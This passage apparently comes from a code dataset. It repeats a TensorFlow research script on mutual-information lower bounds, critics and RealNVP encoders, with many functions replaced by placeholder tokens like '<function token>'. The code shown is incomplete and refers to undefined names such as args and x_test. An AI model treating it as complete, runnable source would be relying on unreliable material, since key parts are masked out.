shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, 